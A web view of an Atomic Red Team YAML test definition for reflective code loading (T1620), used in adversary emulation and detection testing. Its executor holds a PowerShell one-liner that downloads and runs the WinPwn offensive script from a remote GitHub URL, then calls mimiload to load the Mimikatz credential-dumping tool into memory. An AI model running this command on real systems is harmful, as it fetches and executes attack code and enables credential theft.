security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1620/T1620.yaml
T
Hare Sudhan bfdd702717 Remove unused variable (#3040)
2025-01-28 00:02:41 -05:00

14 lines
573 B
YAML
Raw Permalink Blame History

attack_technique: T1620
display_name: "Reflective Code Loading"
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
auto_generated_guid: 56b9589c-9170-4682-8c3d-33b86ecb5119
description: Reflectively load Mimik@tz into memory technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
Reference in New Issue View Git Blame Copy Permalink